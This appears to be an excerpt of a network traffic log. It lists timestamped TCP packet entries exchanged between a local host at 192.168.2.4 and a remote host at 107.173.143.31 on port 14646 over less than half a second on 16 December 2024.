                                                                                                                Dec 16, 2024 07:12:38.635698080 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.636238098 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.638766050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.638892889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.638952971 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.642000914 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.642246962 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.642415047 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.645195961 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.645303965 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.645364046 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.648452997 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.648509026 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.651027918 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.651639938 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.651822090 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.651875019 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.654834032 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.654928923 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.655061007 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.658037901 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.658163071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.658220053 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.661257982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.661354065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.661413908 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.664375067 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743103027 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743170977 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743386030 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.743611097 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743752956 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743793964 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.746103048 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.746210098 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.746280909 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.748007059 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.748110056 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.748112917 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.750458002 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.750550985 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.750611067 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.752888918 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.752948999 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.753015995 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.755337954 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.755429983 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.755474091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.757652998 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.757781982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.757987976 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.759970903 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.760034084 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.760087967 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.762284994 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.762403011 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.762461901 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.764509916 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.764630079 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.764808893 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.766712904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.766778946 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.766810894 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.768889904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.769015074 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.769076109 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.771071911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.771137953 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.771188021 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.773267031 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.773360968 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.773420095 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.775422096 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.775492907 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.775511026 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.777492046 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.777612925 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.777672052 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.779583931 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.779680967 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.779685020 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.781642914 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.781789064 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.781848907 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.783682108 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.783809900 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.783987999 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.785725117 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.785821915 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.785984039 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.787702084 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.787765026 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.787817955 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.789721012 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.789813042 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.790000916 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.791698933 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.791816950 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.792016029 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.793672085 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.793839931 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.794033051 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.795676947 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.795748949 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.795798063 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.797717094 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.797882080 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.797940016 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.799668074 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.799854994 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.799918890 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.801681042 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.801820993 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.801882982 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.803699017 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.803761959 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.803827047 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.805660009 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.805783033 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.805836916 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.807670116 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.807831049 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.807902098 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.809834957 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.809946060 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.809979916 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.811631918 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.811759949 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.811816931 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.813642025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.813757896 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.813817978 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.815623999 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.815749884 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.815805912 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.817624092 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.817724943 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.817784071 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.819627047 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.819680929 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.819752932 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.821654081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.821770906 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.821830034 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.823597908 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.823729992 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.823903084 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.825584888 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.825721025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.825901031 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.827635050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.827687979 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.827729940 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.829603910 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.829735041 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.829796076 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.831608057 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.831759930 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.831933975 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.833616018 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.833782911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.833843946 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.835582972 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.835639000 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.835673094 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.837583065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.837640047 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.837713957 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.839566946 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.839701891 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.839759111 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.841578007 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.841839075 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.841898918 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.843578100 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.843636036 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.843707085 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.845556021 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.845791101 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.845850945 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.847647905 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.847704887 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.847758055 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.849549055 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.851990938 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.934957027 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.935153008 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.935718060 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.935791016 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.935880899 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.936676025 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.937253952 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.937308073 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.937496901 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.938716888 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.938831091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.938883066 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.940181017 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.940295935 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.940352917 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.941659927 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.941775084 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.942061901 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.943106890 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.943223953 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.944179058 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.944569111 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.944691896 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.945842028 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.945977926 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.946106911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.946193933 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.947405100 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.947515965 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.948491096 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.948815107 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.948940992 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.950220108 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.950315952 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.950323105 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.951632977 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.951693058 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.951736927 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.951786995 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.953001022 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.953116894 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.953171015 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.954351902 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.954462051 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.954515934 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.955687046 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.955847025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.956171036 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.957061052 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.957201004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.958363056 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.958421946 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.958483934 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.959671974 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.959794998 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.959837914 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.959837914 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.961064100 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.961158037 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.961210966 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.962321997 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.962430000 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.962482929 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.963618040 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.963725090 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.964886904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.964941025 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.965012074 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.966186047 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.966295958 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.966384888 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.966386080 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.967437029 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.967559099 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.967609882 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.968732119 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.968857050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.968930960 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.969978094 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.970087051 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.971223116 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.971321106 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.971391916 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.971606016 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.972482920 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.972599030 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.972651005 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.973831892 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.973968983 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.974024057 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.974976063 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.975094080 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.976186991 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.976253986 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.976366043 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.976602077 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.977499962 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.977624893 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.977679968 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.978776932 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.978897095 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.979995012 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.980051994 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.980113983 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.980715990 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.981244087 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.981370926 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.981429100 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.982511044 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.982633114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.982686043 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.983763933 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.983886957 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.983978987 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.985018015 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.985133886 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.985467911 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.986269951 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.986392021 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.986443996 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.987539053 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.987646103 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.988415956 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.988778114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.988898039 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.990039110 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.990093946 CET4974014646192.168.2.4107.173.143.31
